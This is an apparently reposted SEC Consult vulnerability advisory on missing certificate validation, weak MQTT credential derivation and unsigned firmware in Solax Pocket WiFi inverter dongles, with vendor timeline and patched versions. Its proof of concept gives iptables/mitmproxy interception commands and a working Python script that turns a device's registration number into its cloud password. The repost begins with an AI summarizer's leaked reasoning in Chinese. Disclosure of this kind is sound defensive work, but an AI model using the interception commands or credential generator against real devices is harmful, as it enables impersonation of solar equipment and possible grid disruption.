SEC Consult SA-20260212-0 :: Multiple Vulnerabilities in various Solax Power Pocket WiFi models
嗯,用户发来了一段关于Solax Power Pocket WiFi设备漏洞的安全公告。他让我用中文总结一下内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。 首先,我需要通读整个公告,找出关键信息。公告提到有三个漏洞:缺少证书验证、不安全的凭据生成和缺少固件真实性检查。这些漏洞都属于高危级别,可能被用来进行大规模攻击,比如中断电网或者注入恶意固件。 接下来,我需要确定每个漏洞的影响。第一个漏洞允许中间人攻击,第二个让攻击者能通过注册号连接MQTT服务器,第三个则让固件容易被篡改。 然后,我还要看看厂商的解决方案。他们提供了补丁,并建议用户立即更新固件。此外,他们还推荐进行安全审查以发现潜在问题。 现在,我要把这些信息浓缩到100字以内。要确保涵盖主要漏洞、影响和解决方案。同时,语言要简洁明了,不使用复杂的术语。 最后,检查字数是否符合要求,并确保没有遗漏关键点。 </think> 该安全公告披露了Solax Power Pocket WiFi设备的三个高危漏洞:缺少证书验证、不安全的凭据生成和缺失固件真实性检查。这些漏洞可能导致大规模中间人攻击、恶意固件注入及电网中断等威胁。厂商已提供补丁并建议用户立即更新固件以修复问题。 2026-2-16 21:10:24 Author: seclists.org(查看原文) 阅读量:2 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Feb 2026 10:53:04 +0000

SEC Consult Vulnerability Lab Security Advisory < 20260212-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Various Solax Power Pocket WiFi models
 vulnerable version: See section below
      fixed version: See section below
         CVE number: CVE-2025-15573, CVE-2025-15574, CVE-2025-15575
             impact: High
           homepage:https://www.solaxpower.com
              found: 2025-04-15
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Founded in 2012, SolaX has rapidly risen to become a global leader in
photovoltaic energy storage systems and solutions. Leading the way in
industry innovation, SolaX introduced Asia’s first energy storage inverter
and has successfully launched five major product series over the years."

Source:https://www.solaxpower.com/about/


Business recommendation:
------------------------
The vendor provides patches for the affected Pocket models which can be
obtained throw their customers' Solax Cloud accounts and using the Pocket
firmware upgrade function there. They should be installed immediately if
the device is not already patched.

SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Missing Certificate Validation for SolaX Cloud MQTT Connection (CVE-2025-15573)
The device does not validate the server certificate when connecting to the
SolaX Cloud MQTTS server hosted in the Alibaba Cloud
(mqtt001.solaxcloud.com, TCP 8883). This allows attackers in a
man-in-the-middle position to act as the legitimate MQTT server and issuing
arbitrary commands to devices.

Large scale man-in-the-middle attacks are feasible for attackers with the
capabilities to execute attacks such as BGP hijacking, DNS spoofing or
intercepting communication at the backbone level (e.g. nation state).

Possible threats are:
- Disrupting the electric grid by repeatedly starting/stopping inverters.
- Getting initial access to the victim's local networks by flashing malicious
  firmware on the dongles.
- Causing physical damage by flashing malicious firmware on the inverters
  (disabling firmware-based safety checks + introducing malicious behavior like
  overvoltage, frequency mismatches, etc.).


2) Insecure Credential Generation for Solax Cloud MQTT Connection (CVE-2025-15574)
When connecting to the Solax Cloud MQTT server the username is the
"registration number", which is the 10 character string printed on the device /
the QR code on the device. The password is derived from the "registration
number" using a proprietary XOR/transposition algorithm.
Attackers with the knowledge of the registration numbers can connect to the
MQTT server and impersonate the dongle / inverters.


3) Missing Firmware Authenticity Checks (CVE-2025-15575)
The firmware update functionality does not verify the authenticity of the
supplied firmware update files. This allows attackers to flash malicious
firmware update files on the device.


Proof of concept:
-----------------
1) Missing Certificate Validation for SolaX Cloud MQTTS Connection (CVE-2025-15573)
The following commands can be used to intercept the communication between a device
and the Solax Cloud.

iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
iptables -t nat -A PREROUTING -i wlan0 -p tcp -m tcp --dport 8883 -j REDIRECT --to-ports 8080
mitmproxy --mode transparent --set connection_strategy=lazy --set tls_version_client_min=TLS1_2 --set 
tls_version_server_min=TLS1_2 -k -v


2) Insecure Credential Generation for Solax Cloud MQTT Connection (CVE-2025-15574)
The following python script implements the password derivation given the
registration number:

python ```
import re

def generate_solax_password(registration_number):
    registration_number = bytearray(registration_number.encode())
    password = bytearray(8)

    password[0] = registration_number[7]
    password[1] = registration_number[4]
    password[2] = registration_number[3]
    password[3] = registration_number[6]
    password[4] = registration_number[5]
    password[5] = registration_number[2]
    password[6] = registration_number[9]
    password[7] = registration_number[8]

    for i in range(len(password)):

        xored = password[i] ^ 0xb
        if re.match(r'[A-Z0-9]', chr(xored)):
            password[i] = xored
        else:
            print('else case')
            password[i] = ord('A')

    return password.decode('ascii')

registration_number = "SM3XXXXXXX"
password = generate_solax_password(registration_number)
print(registration_number,password)
```

3) Missing Firmware Authenticity Checks (CVE-2025-15575)
No proof-of-concept is provided. Initial analysis of the firmware update
functionality does not show any cryptographic checks (e.g. digital signature
checks) on the supplied firmware update files.
Furthermore, ESP32 security features such as secure boot are not used.


Vulnerable / tested versions:
-----------------------------
The following version has been tested on a Solax Power Pocket WiFi V3:
* 618.00415.00_Pocket_WIFI_V3.015.02_20240122

It is likely that other SolaX / QCells products that directly connect to the
SolaX Cloud are affected. This includes inverter Wi-Fi/LAN/LTE dongles,
Adapter Box, EV Charger, etc.

The vendor provided the following further affected products:
1. Pocket WiFi 3.0
2. Pocket WiFi+LAN
3. Pocket WiFi+4GM
4. Pocket WiFi+LAN 2.0
5. Pocket WiFi 4.0


Vendor contact timeline:
------------------------
2025-05-05: Contacting vendor throughservice () solaxpower com; no response.
2025-05-16: Contacting vendor through multiple other email addresses from their
            website.
2025-05-20: Asking a direct contact at SolaX Power for a security contact.
2025-05-27: Vendor security team responds with PGP key.
2025-05-28: Sending encrypted advisory.
2025-06-09: Vendor responds with analysis of the issues and that
            a new firmware will be released by the end of July 2025.
2025-06-12: Asking a few follow-up questions, which other products are affected,
            and whether manual update is necessary or automatically pushed.
            No response.
2025-07-10: Asking vendor again & regarding patch availability. No response.
2026-02-09: Following up again, setting release date to 26th February, reserving
            CVE numbers.
2026-02-10: Vendor provides detailed model information with updated firmware versions.
            Setting disclosure date to 12th February as everything is fixed
            according to the vendor.
2026-02-26: Public release of advisory.


Solution:
---------
The vendor provides patches for the affected Pocket models which can be
obtained throw their customer's Solax Cloud account and using the Pocket
firmware upgrade function there.

As of February 10, 2026, the firmware versions for each affected Pocket model
are as follows according to the vendor:
1. Pocket WiFi 3.0 – (3.022.03)
2. Pocket WiFi+LAN – (1.009.02)
3. Pocket WiFi+4GM – (1.005.05)
4. Pocket WiFi+LAN 2.0 – (006.06)
5. Pocket WiFi 4.0 – (003.03)

The vendor provided the following further information regarding EV Charger
and Adapter Box:
1. EV Charger: The WiFi module firmware supports digital signature, but only one-way
   authentication is implemented.
2. Adapter Box: The WiFi module firmware supports two-way authentication and digital
   signature.


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:https://blog.sec-consult.com
X:https://x.com/sec_consult

EOF Stefan Viehböck / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • SEC Consult SA-20260212-0 :: Multiple Vulnerabilities in various Solax Power Pocket WiFi models SEC Consult Vulnerability Lab via Fulldisclosure (Feb 16)

文章来源: https://seclists.org/fulldisclosure/2026/Feb/17
如有侵权请联系:admin#unsafe.sh